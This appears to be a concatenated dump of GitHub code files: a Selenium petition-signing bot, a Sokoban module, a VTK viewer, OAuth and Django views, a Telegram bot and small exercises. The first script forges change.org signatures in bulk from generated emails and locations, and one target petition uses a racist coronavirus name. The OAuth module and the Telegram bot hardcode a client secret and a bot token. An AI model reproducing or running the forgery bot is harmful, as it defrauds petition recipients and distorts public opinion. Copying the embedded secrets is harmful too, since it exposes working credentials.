\"https://www.change.org/p/nba-2k-fire-ronnie-for-false-advertising\"\npetition = \"https://www.change.org/p/world-health-organization-change-the-coronavirus-name-to-the-kung-flu\"\n\nlog = False # Track Program Progress\nusers = False # View Info Generated\ntiming = True # Time to Execute Block\nprogress = True # Visual\ngen = True # Basic Markers\nmax_email = 15\n\nstart_time = time.time()\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--incognito\")\ndriver = webdriver.Chrome(options=chrome_options)\nemails = []\n\n\n# Complie email list\nif gen:\n print(\"\\ngenerating emails...\")\nemail_start_time = time.time()\ndriver.get(email_generator)\ndriver.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').clear()\ndriver.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').send_keys(max_email)\ndriver.find_element_by_xpath('/html/body/div/div[1]/main/article/div[3]/aside/p/button').click()\nemail_lst = driver.find_elements_by_tag_name(\"li\")\ncount = 0\nfor email in email_lst:\n if 4 < count < len(email_lst) - 6:\n emails.append(email.text)\n count += 1\nif log:\n print(str(len(emails)) + \" emails generated\\n\\n\\n\")\ndriver.close()\nif timing:\n print(\" emails generated in \" + str(time.time() - email_start_time) + \" seconds!\")\n print(\" avg: \" + str((time.time() - email_start_time) / len(emails)) + \" seconds per email.\")\n\n\n# Compile location list and sub-elements\nif gen:\n print(\"generating locations...\")\nlocation_start_time = time.time()\nlocation_randomizer = webdriver.Chrome(options=chrome_options)\nlocation_randomizer.get(location_generator)\nlocation_randomizer.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').clear()\nlocation_randomizer.find_element_by_xpath('//*[@id=\"rand_options_qty\"]').send_keys(len(emails))\nlocation_randomizer.find_element_by_xpath('/html/body/div/div[1]/main/article/div[3]/aside/p/button').click()\nzip_codes = location_randomizer.find_elements_by_class_name(\"rand_large\")\ncities_states = location_randomizer.find_elements_by_class_name(\"rand_medium\")\nif timing:\n print(\" locations generated in \" + str(time.time() - location_start_time) + \" seconds!\")\n print(\" avg: \" + str((time.time() - location_start_time) / len(zip_codes)) + \" seconds per location.\")\n\n\n# Post generated info to Change.org petition\nif gen:\n print(\"posting to website...\")\nposting_start_time = time.time()\nemail_count = 0\nfor email in emails:\n if progress and (email_count + 1) % 10 == 0:\n print('#')\n elif progress:\n print('#', end=\"\", flush=True)\n if log and email_count == 0:\n print(\"booting up driver...\")\n elif log:\n print(\"rebooting driver...\")\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(petition)\n if log:\n print(\"generating signature \" + str(email_count + 1) + \" out of \" + str(len(emails)))\n first_input = driver.find_element_by_id(\"firstName\")\n last_input = driver.find_element_by_id(\"lastName\")\n email_input = driver.find_element_by_id(\"email\")\n name = email.partition(\"@\")[0]\n first_name, last_name = name[:len(name) // 2], name[len(name) // 2:]\n\n first_input.send_keys(first_name)\n last_input.send_keys(last_name)\n email_input.send_keys(str(email))\n driver.find_element_by_xpath('//*[@id=\"public\"]').click() # don't show info\n\n driver.find_element_by_xpath('//*[@id=\"page\"]/div[1]/div[3]/div[2]/div/div/div/div[2]/div[2]/form/button[1]/div/div/div[2]/div/div/div').click() # open location editor\n Select(driver.find_element_by_xpath('//*[@id=\"countryCode\"]')).select_by_value('US')\n zip_code = zip_codes[email_count].text\n city_state = str(cities_states[email_count].text).partition(', ')\n state = city_state[2]\n city = city_state[0]\n Select(driver.find_element_by_xpath('//*[@id=\"stateCode\"]')).select_by_visible_text(state)\n driver.find_element_by_xpath('//*[@id=\"city\"]').send_keys(city)\n driver.find_element_by_xpath('//*[@id=\"postalCode\"]').send_keys(zip_code)\n\n driver.find_element_by_xpath('//*[@id=\"page\"]/div[1]/div[3]/div[2]/div/div/div/div[2]/div[2]/form/button').click() # submit\n if users:\n print(\"USER \" + str(email_count + 1))\n print(\" first name: \" + str(first_name))\n print(\" last name: \" + str(last_name))\n print(\" email: \" + str(email))\n print(\" state: \" + str(state))\n print(\" zip: \" + str(zip_code))\n print(\" city: \" + str(city) + \"\\n\")\n email_count += 1\n driver.close()\nlocation_randomizer.close()\nif timing:\n print(\"\", flush=False)\n print(\" posting completed in \" + str(time.time() - posting_start_time) + \" seconds!\")\n print(\" avg: \" + str((time.time() - posting_start_time) / len(emails)) + \" seconds per signature.\")\n\nif gen:\n if not timing:\n print(\"\", flush=False)\n print(str(len(emails)) + \" signatures forged in \" + str(time.time() - start_time) + \" seconds!\")\n\n\n'''\nRuntime\n 10 entries\n - \n - \n - \n'''\n","repo_name":"Joftus/Bots4Change","sub_path":"Core.py","file_name":"Core.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41098424216","text":"\n# use for run some tests on methods\n\n\ndef foo(arg1: int =1):\n if hasattr(int,'arg1'):\n print('hasattr')\n else:\n print('not hasattr')\n print(arg1)\n\n\ndef main():\n # foo()\n # print(type(foo))\n\n test_quicksort()\n\n\n\n\ndef test_quicksort(cases: int = 20):\n import test\n import sorts\n for i in range(cases):\n lst = test.random_array()\n # print('lst: ',lst)\n lstcopy = lst[:]\n sorts.quicksort(lstcopy,0,len(lstcopy))\n print('sorted lst: ',lstcopy)\n test.equal_list(lstcopy,sorted(lst))\n\n print('{ message: no other things means everything is ok! }')\n\n lst = [2,1,2,2,2,2,2,2,2]\n sorts.quicksort(lst,0,len(lst))\n print('lst: ',lst)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"15814/algorithm","sub_path":"sorts/test_scripts.py","file_name":"test_scripts.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74796599234","text":"import search_board\n\ndef sokoban_load_levels(filename):\n \"\"\"\n Loads all sokoban levels from a file.\n The levels have to be seperated with a new line.\n \"\"\"\n level_list = []\n board = []\n with open(filename) as level_file: # open file\n y_axis = 0 # current y_axis we are on.\n for line in level_file: # for every line in file\n if line == \"\\n\": # if the current line is a \"new line\", we reached a new level. Save current level to level list and reset the temp lists.\n level_list.append(board)\n board = []\n y_axis = 0 # reset y_axis\n objects_in_line = list(line) #convert the current line in to a list\n for x, obj in enumerate(objects_in_line): # go through each object in the list\n if obj not in \"\\n \": #if the object is not a new line, add it to correct temp list\n add_to_objectlist(obj, x, y_axis,board)\n\n y_axis += 1 #increment y_axis because we are moving down a line in the file\n return level_list\n\ndef sokoban_load(level, level_list):\n \"\"\"\n Loads a level from level_list\n Index - 0 - 48\n \"\"\"\n\n if len(level_list) > 0: #make sure we have a list with levels in them\n amount_of_boxes = 0 #amount of boxes in level\n temp_list = level_list[level] #get the level requested from level_list and put it in a temp list.\n for tile in temp_list: #go through each tile in the level\n if \"o\" in tile: #if there is a box on the tile\n amount_of_boxes += 1\n\n return temp_list, amount_of_boxes #return the level requested and the amount_of_boxes in level\n\ndef add_to_objectlist(obj, x, y, board):\n \"\"\"\n Adds the current object to the board\n \"\"\"\n\n if obj == '#' or obj == '@' or obj =='o' or obj=='.' :\n board.append([obj, x, y])\n\ndef max_x_y(board):\n \"\"\"Finds the boundaries of the level\"\"\"\n x_highest = 0\n y_highest = 0\n\n for obj in board:\n # make sure obj is a wall\n if obj[0] == \"#\":\n # if obj x is higher than current x highest\n if x_highest < obj[1]:\n x_highest = obj[1]\n # if obj y is higher than current y highest\n if y_highest < obj[2]:\n y_highest = obj[2]\n\n return x_highest + 1, y_highest + 1\n\ndef sokoban_display(board):\n \"\"\"Displays the board\"\"\"\n x_max, y_max = max_x_y(board) #find the boundaries of the level\n\n visual_board = \"\"\n\n for y in range(y_max): #go from top line of level to bottom\n for x in range(x_max): #go from left to right in level\n items_to_print = search_board.find_in_board(x, y, board) #find all objects on the current tile of the level\n if len(items_to_print) == 1: #if there is only one item on the tile\n print(items_to_print[0][0], end = '') #print the item\n elif len(items_to_print) == 2: #if there is two items on the tile\n for items in items_to_print: #go through the items and print the correct symbol\n if \"@\" in items: #if player is standing on a storage area\n print(\"+\", end = '')\n elif \"o\" in items: #if a box is on a storage area\n print(\"*\", end = '')\n else: #if there is nothing on the tile\n print(\" \", end = '')\n\n print(\"\")\n\ndef isGameOver(level, objectives):\n \"\"\"\n Checks if the game is over.\n \"\"\"\n\n correct_boxes = 0\n\n for tile in level: #go through each tile in level\n if \"o\" in tile: #if there is a box on tile\n list_of_items = search_board.find_in_board(tile[1], tile[2], level) #find all items on the tile\n if len(list_of_items) > 1: #if there is two items on tile\n for item in list_of_items:\n if \"o\" in item: #is the box on a storage area?\n correct_boxes += 1\n\n return correct_boxes == objectives\n","repo_name":"diblaze/TDP002","sub_path":"4/gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26383352181","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nSimple VTK Viewer.\n\nExample:\n\n$ viewer.py -f head.vtk\n\"\"\"\nfrom optparse import OptionParser\nimport sys\n\nimport vtk\nfrom PyQt5.QtWidgets import QGridLayout, QDialog, QPushButton, QApplication\nimport vtk.qt\nvtk.qt.QVTKRWIBase = 'QGLWidget'\nfrom vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\n\nclass QVTKViewer(QDialog):\n \"\"\"\n Simple VTK Viewer.\n \"\"\"\n\n def initUI(self):\n\n grid = QGridLayout()\n self.vtkWidget = QVTKRenderWindowInteractor(self)\n grid.addWidget(self.vtkWidget, 0, 0, 1, 1)\n\n btn_close = QPushButton(\"close\", self)\n btn_close.clicked.connect(self.close)\n grid.addWidget(btn_close, 1, 0, 1, 1)\n\n self.setLayout(grid)\n self.setWindowTitle('VTK Viewer')\n self.show()\n\n def __init__(self, vtk_filename):\n \"\"\"\n Initiate Viwer\n\n Parameters\n ----------\n vtk_filename : str\n Input VTK filename\n \"\"\"\n\n QDialog.__init__(self)\n self.initUI()\n\n ren = vtk.vtkRenderer()\n self.vtkWidget.GetRenderWindow().AddRenderer(ren)\n iren = self.vtkWidget.GetRenderWindow().GetInteractor()\n\n # VTK file\n reader = vtk.vtkUnstructuredGridReader()\n reader.SetFileName(vtk_filename)\n reader.Update()\n\n # VTK surface\n surface = vtk.vtkDataSetSurfaceFilter()\n surface.SetInputConnection(reader.GetOutputPort())\n surface.Update()\n\n mapper = vtk.vtkDataSetMapper()\n mapper.SetInputConnection(surface.GetOutputPort())\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().EdgeVisibilityOn()\n actor.GetProperty().SetEdgeColor(1, 1, 1)\n actor.GetProperty().SetLineWidth(0.5)\n ren.AddActor(actor)\n\n # annot. cube\n axesActor = vtk.vtkAnnotatedCubeActor()\n axesActor.SetXPlusFaceText('R')\n axesActor.SetXMinusFaceText('L')\n axesActor.SetYMinusFaceText('H')\n axesActor.SetYPlusFaceText('F')\n axesActor.SetZMinusFaceText('A')\n axesActor.SetZPlusFaceText('P')\n axesActor.GetTextEdgesProperty().SetColor(1, 1, 0)\n axesActor.GetCubeProperty().SetColor(0, 0, 1)\n self.axes = vtk.vtkOrientationMarkerWidget()\n self.axes.SetOrientationMarker(axesActor)\n self.axes.SetInteractor(iren)\n self.axes.EnabledOn()\n self.axes.InteractiveOn()\n\n ren.ResetCamera()\n iren.Initialize()\n\n\nusage = '%prog [options]\\n' + __doc__.rstrip()\nhelp = {\n 'in_file': 'input VTK file with unstructured mesh',\n}\n\n\ndef main():\n parser = OptionParser(description='Simple VTK Viewer')\n parser.add_option('-f','--filename', action='store',\n dest='in_filename', default=None,\n help=help['in_file'])\n (options, args) = parser.parse_args()\n\n if options.in_filename is None:\n raise IOError('No VTK data!')\n\n app = QApplication(sys.argv)\n viewer = QVTKViewer(options.in_filename)\n viewer.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vlukes/dicom2fem","sub_path":"dicom2fem/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"1778495029","text":"from nevow import rend, inevow\nfrom oauthlib.oauth2 import InvalidClientError\n\nfrom exe.webui.renderable import Renderable\n\nclass ProcomunOauth(Renderable, rend.Page):\n CLIENT_ID = '1Zl5ATaKchp8hecNGGhpfvQnUZaRTxkS'\n CLIENT_SECRET = '5ESrTI1QXb971YdZk22t5XOWCRWOuzHRV1L1Ho8aOl7NuTFN'\n BASE_URL = 'https://procomun.educalab.es'\n REDIRECT_URI = 'http://localhost:51235/oauth/procomun/callback'\n AUTHORIZATION_BASE_URL = BASE_URL + '/oauth2/authorize'\n TOKEN_URL = BASE_URL + '/oauth2/token'\n name = 'procomun'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n self.states = {}\n\n def child_callback(self, ctx):\n return self\n\n def saveState(self, state, oauth2Session, client):\n self.states[state] = (oauth2Session, client)\n\n def render_start(self, ctx, data):\n request = inevow.IRequest(ctx)\n state = self.states.get(request.args.get('state', [None])[0])\n script = (\n '''top.Ext.getCmp('oauthprocomun').close()'''\n )\n if state:\n code = request.args.get('code', [None])[0]\n oauth2Session, client = state\n script = ''\n try:\n client.session.oauthToken['procomun'] = oauth2Session.fetch_token(self.TOKEN_URL, client_secret=self.CLIENT_SECRET, code=code)\n script = ('''\n top.Ext.getCmp('oauthprocomun').hide();\n top.eXe.app.getController(\"Toolbar\").exportProcomun();\n top.Ext.getCmp('oauthprocomun').close();\n ''')\n except InvalidClientError:\n script = '''\n top.Ext.getCmp('oauthprocomun').hide();\n top.eXe.app.getController(\"Toolbar\").showOAuthError(\"%s\");\n top.Ext.getCmp('oauthprocomun').close();\n ''' % client.packageName\n # This exception is raised when the user clicks the Cancel button\n except ValueError:\n script = '''\n top.Ext.getCmp('oauthprocomun').close();\n '''\n\n return ctx.tag()[script]\n\n\nclass GDriveOauth(Renderable, rend.Page):\n name = 'gdrive'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n\n def render_start(self, ctx, data):\n script = ('''\n <html>\n <head>\n <title>Export Package to Google Drive\n \n \n \n

Export Package to Google Drive

\n \n ''')\n return ctx.tag()[script]\n\n\nclass OauthPage(Renderable, rend.Page):\n name = 'oauth'\n _templateFileName = 'oauth.html'\n\n def __init__(self, parent):\n parent.putChild(self.name, self)\n Renderable.__init__(self, parent)\n rend.Page.__init__(self)\n self.procomun = ProcomunOauth(self)\n\n def child_procomun(self, ctx):\n return self.procomun","repo_name":"exelearning/iteexe","sub_path":"exe/webui/oauthpage.py","file_name":"oauthpage.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"61"} +{"seq_id":"35376094751","text":"import csv\n\ntotal = 12629\n\nfile = open('summary.csv','w')\nwriter = csv.writer(file)\n\nwriter.writerow(['nat', 'adv'])\n\nfor i in range(0, 3):\n\n\twith open('data_' + str(i) + '_nat.csv') as file_obj:\n\n\t\treader_obj = csv.reader(file_obj)\n\n\t\tcorrect_nat = 0\n\n\t\tfor row in reader_obj:\n\t\t\tif row[2] == row[3]:\n\t\t\t\tcorrect_nat += 1\n\n\twith open('data_' + str(i) + '_adv.csv') as file_obj:\n\n\t\treader_obj = csv.reader(file_obj)\n\n\t\tcorrect_adv = 0\n\n\t\tfor row in reader_obj:\n\t\t\tif row[2] == row[3]:\n\t\t\t\tcorrect_adv += 1\n\n\twriter.writerow([str(correct_nat), str(correct_adv)])\n\n","repo_name":"yyou22/Traffic_Sign_Data_Preparation","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33416628873","text":"\"\"\"Initial Migration\n\nRevision ID: d196cfe04b62\nRevises: 4a32527db6b0\nCreate Date: 2022-02-08 22:48:20.482957\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd196cfe04b62'\ndown_revision = '4a32527db6b0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=255), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('pitches', sa.Column('category', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('pitches', 'category')\n op.drop_table('comments')\n # ### end Alembic commands ###\n","repo_name":"GraceMwende/Pitches","sub_path":"migrations/versions/d196cfe04b62_initial_migration.py","file_name":"d196cfe04b62_initial_migration.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33529528109","text":"#!/usr/bin/python3\n\"\"\" This module prints a square with the character # \"\"\"\n\n\ndef print_square(size):\n \"\"\" This function prints a square of size \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n string = (((\"#\" * size) + \"\\n\") * size)\n if string != \"\":\n string = string[:-1]\n print(string)\n","repo_name":"maybe-william/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43720614695","text":"import sys\n\nplayer = []\n\n\n# Set Number of Players\ndef num_players(p_names):\n global player\n for name in p_names:\n player.append([name, 0])\n\n\n# Set Score Calculator\ndef score_calc():\n global player\n game_over = 0\n while game_over < 9:\n for i in player:\n i[1] += int(input(i[0] + \" Score:\"))\n print(player)\n game_over += 1\n\n\n# Display Winner\ndef display_winner():\n global player\n player.sort(key=lambda x: x[1])\n print(\"\\n\\nGAME OVER\\n\\n\")\n print(\"Winner is \" + player[0][0])\n\n\n# Main Function\ndef main():\n global player\n del sys.argv[0]\n num_players(sys.argv)\n score_calc()\n display_winner()\n\n\n# Run Main\nif __name__ == '__main__':\n main()\n","repo_name":"Scepticae/My-Coding-Projects","sub_path":"Personal Projects/ScoreKeeper/scoreKeeper.py","file_name":"scoreKeeper.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39836779248","text":"# https://open.kattis.com/problems/yikes\n# Wrong Answer on TC 2 - reason unknown as of contest end\n\nTC = int(input())\n\nfor _ in range(TC):\n M,B,D,T = [float(i) for i in input().split()]\n\n maxL = T+ 4.5/M\n maxR = T+ 5.5/M\n\n #print(M,B,D,T, 'MAX!!', maxL,maxR)\n\n if maxR < D/B:\n print(\"Max beats the first bicycle\")\n continue\n\n for bike in range(10):\n m_D = D + 4*bike\n mL = m_D/B\n mR = (m_D+2)/B\n #print(mL, mR)\n # if his crossing is not out of range with the bike\n if not (maxL > mR or maxR < mL):\n print(\"Collision with bicycle\", bike+1)\n break\n # if he crosses\n elif maxL > mR:\n if bike == 9 or maxR < (m_D+4)/B:\n print(\"Max crosses safely after bicycle\", bike+1)\n break","repo_name":"jeffreyyun/CompetitiveProgrammingProblems","sub_path":"ICPC_Notes/icpc_kattis_2017Fall/yikesbikes.py","file_name":"yikesbikes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7562213043","text":"from telegram import Bot\nfrom telegram.ext import Updater, MessageHandler, Filters\n\ntoken = '5708454167:AAGp2GFfRpeuSEZF9RTo9O5tEAyanFT3Hq8'\n\nbot = Bot(token)\nupdater = Updater(token)\ndispatcher = updater.dispatcher\n\ndef start(update, context):\n text = update.message.text\n\n if 'абв' in text.lower():\n context.bot.send_message(update.effective_chat.id, text.replace('абв', ''))\n else:\n context.bot.send_message(update.effective_chat.id, text)\n\nstart_handler = MessageHandler(Filters.text, start)\n\ndispatcher.add_handler(start_handler)\n\nupdater.start_polling()\nupdater.idle()","repo_name":"DimPin/lessons-python","sub_path":"homework-9/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22039147320","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom social.models import UserProfile, Notification\nfrom .models import ConnectionsList, ForgeLink\nfrom social.forms import UserProfileForm\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.db.models import Q\nfrom chat.models import singleOneToOneRoom, Connected\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nimport cv2\nfrom .utils import (\n is_ajax, convertDimensions,\n save_Base64_Temp_ImageString,\n get_forge_link_or_false,\n prune_presence,\n)\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\ndef getUserProfileForm(request, profile_slug):\n payload = {}\n try:\n profile = UserProfile.objects.get(profile_slug=profile_slug)\n except UserProfile.DoesNotExists():\n payload[\"error\"] = \"Something went wrong with getting your profile. Try later....\"\n form = UserProfileForm(request.POST or None, instance=profile)\n if is_ajax(request=request):\n if request.method == \"GET\":\n context = {\"form\": form, }\n template = render_to_string(\n \"connection/profile_update.html\", context, request=request)\n return JsonResponse({\"template\": template, \"profileUrl\": profile.avatar.url})\n else:\n if form.is_valid():\n # getting the changed field name\n field_name = None\n field_value = None\n if len(form.changed_data) > 0:\n field_name = form.changed_data[0]\n field_obj = UserProfile._meta.get_field(field_name)\n # get the new value of the field\n field_value = field_obj.value_from_object(profile)\n form.save()\n payload[\"success\"] = True\n payload[\"new_value\"] = field_value\n payload[\"field_name\"] = field_name\n payload[\"max_size\"] = settings.MAX_SIZE_FOR_UPLOAD\n else:\n payload[\"success\"] = False\n return JsonResponse(payload)\n\n\n@login_required\ndef crop_image(request):\n payload = {}\n user = request.user\n if request.method == \"POST\" and is_ajax(request=request):\n try:\n # getting the image from the ajax\n image = request.POST.get(\"imageString\")\n url = save_Base64_Temp_ImageString(\n image) # save the image temporarly\n cropX = convertDimensions(request.POST.get(\"cropX\"))\n cropY = convertDimensions(request.POST.get(\"cropY\"))\n cropWidth = convertDimensions(request.POST.get(\"cropWidth\"))\n cropHeight = convertDimensions(request.POST.get(\"cropHeight\"))\n\n img = cv2.imread(url)\n if cropX < 0:\n cropX = 0\n if cropY < 0:\n cropY = 0\n\n cropped_image = img[cropY:cropY+cropHeight, cropX:cropX+cropWidth]\n cv2.imwrite(url, cropped_image)\n user.profile.avatar.save(\n f\"{user.id}_profile_image.png\", File(open(url, \"rb\")))\n payload[\"success\"] = True\n payload[\"profile_url\"] = user.profile.avatar.url\n except Exception as e:\n payload[\"success\"] = False\n payload[\"error\"] = e\n return JsonResponse(payload)\n\n\n@login_required\ndef Sending_Link_Forge(request):\n payload = {}\n user = request.user\n if is_ajax(request=request) and request.method == \"POST\":\n receiver_profile_slug = request.POST.get(\"profile_slug\")\n receiver = UserProfile.objects.get(\n profile_slug=receiver_profile_slug).user\n try: # Getting a cancelled request if exists and setting it active again\n old_Link = ForgeLink.objects.get(sender=user, receiver=receiver)\n if old_Link:\n if not old_Link.is_active:\n old_Link.is_active = True # Setting it back to True\n old_Link.save()\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{receiver.id}\"\n new_notif = Notification.objects.create(\n user_from=user, user_to=receiver,\n message=\"sent you a connection request\",\n type_off=5\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n else:\n payload[\"error\"] = \"You have already sent a link request to this user\"\n else: # means there is not old request at all\n new_con = ForgeLink.objects.create(\n sender=user, receiver=receiver)\n new_con.save()\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n except ForgeLink.DoesNotExist:\n new_con = ForgeLink.objects.create(\n sender=user, receiver=receiver)\n new_con.save()\n # hangle the notification to the receiver......\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{receiver.id}\"\n new_notif = Notification.objects.create(\n user_from=user, user_to=receiver,\n message=\"sent you a connection request\",\n type_off=5\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n payload[\"success\"] = True\n payload[\"profile_owner\"] = receiver.username\n return JsonResponse(payload)\n\n\n@login_required\ndef cancelForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n profile_slug = request.POST.get('profile_slug')\n receiver = UserProfile.objects.get(profile_slug=profile_slug).user\n try:\n link = ForgeLink.objects.get(\n sender=request.user, receiver=receiver, is_active=True)\n if link:\n link.is_active = False\n link.save()\n payload[\"success\"] = True\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Sorry! Impossible to cancel this request now. Try later!!!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef deleteForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n request_id = request.POST.get('request_id')\n try:\n link = ForgeLink.objects.get(id=request_id)\n if link:\n link.decline()\n link.save()\n payload[\"success\"] = True\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Sorry! Impossible to delete this request now. Try later!!!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef acceptForgeLink(request):\n payload = {}\n if is_ajax(request=request) and request.method == \"POST\":\n request_id = request.POST.get(\"request_id\")\n try:\n link = ForgeLink.objects.get(pk=request_id)\n link.accept()\n link.save()\n # creating the chat room for these 2 new connected users\n user1, user2 = link.sender, link.receiver\n\n q_filter = Q(first_user=user1, second_user=user2) | Q(\n first_user=user2, second_user=user1)\n qs = singleOneToOneRoom.objects.filter(q_filter).exists()\n if not qs:\n chat_room = f\"room-{user1.id}-{user2.id}\"\n singleOneToOneRoom.objects.create(\n first_user=user1, second_user=user2, room_name=chat_room)\n payload[\"success\"] = True\n # notify the user about the request acceptance\n channel_layer = get_channel_layer()\n room_name = f\"comment_or_post_listener_{user1.id}\"\n new_notif = Notification.objects.create(\n user_from=user2, user_to=user1,\n message=\"has accepted your connection request\",\n type_off=4\n )\n async_to_sync(channel_layer.group_send)(\n room_name,\n {\n \"type\": \"send_notification_to_post_author\",\n \"liker\": new_notif.user_from.username,\n \"notification\": new_notif.message,\n \"avatar_url\": new_notif.user_from.profile.avatar.url,\n \"date_notif\": new_notif.date_sent,\n \"notif_type\": new_notif.type_off,\n }\n )\n payload[\"sender\"] = link.sender.username\n except ForgeLink.DoesNotExist:\n payload[\"error\"] = \"Cannot accept this request now. Please Try later !!\"\n return JsonResponse(payload)\n\n\n@login_required\ndef Unlink(request):\n payload = {}\n user = request.user\n if is_ajax(request=request) and request.method == 'POST':\n removee_id = request.POST.get(\"removee_id\")\n # need to check if the removee is inside of the list of connections\n # first before making the remove action. Use the areLinked method\n removee = User.objects.get(pk=removee_id)\n try:\n link = ConnectionsList.objects.get(user=user)\n if link.areLinked(removee): # just a simple check\n link.unlink(removee)\n payload[\"success\"] = True\n payload[\"sender\"] = removee.username\n else:\n payload[\"error\"] = f\"You can only remove a user within your connections\"\n except ConnectionsList.DoesNotExist:\n payload[\"error\"] = f\"Cannot unlink {removee.username} now. Please try later!\"\n return JsonResponse(payload)\n\n\ndef cleanUnreadNotif(request):\n current_user = request.user\n if is_ajax(request=request):\n type_of = request.GET.get(\"type_of\", None)\n if type_of == \"msg\":\n notifs = Notification.objects.filter(\n user_to=current_user, seen=False, type_off=6)\n for notif in notifs:\n notif.seen = True\n notif.save()\n else:\n notifs = Notification.objects.filter(\n user_to=current_user, seen=False).exclude(type_off=6)\n for notif in notifs:\n notif.seen = True\n notif.save()\n\n return JsonResponse({\"success\": True})\n\n\ndef prunePresenceAjaxView(request):\n if is_ajax(request=request):\n if request.user.is_authenticated:\n # need to get the room name or what\n cons = Connected.objects.filter(user=request.user)\n if cons:\n prune_presence(cons)\n else:\n return JsonResponse({})\n return JsonResponse({'success': True})\n","repo_name":"SahineDiallo/SpiderNetwork","sub_path":"Connection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30712121702","text":"# btech work \n\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nimport torch.nn.functional as F\nfrom torchsummary import summary \nfrom functools import partial\nfrom tensorboardX import SummaryWriter\nimport numpy as np\nimport pdb\n\n\n# writer = SummaryWriter()\n\nnonlinearity = partial(F.relu, 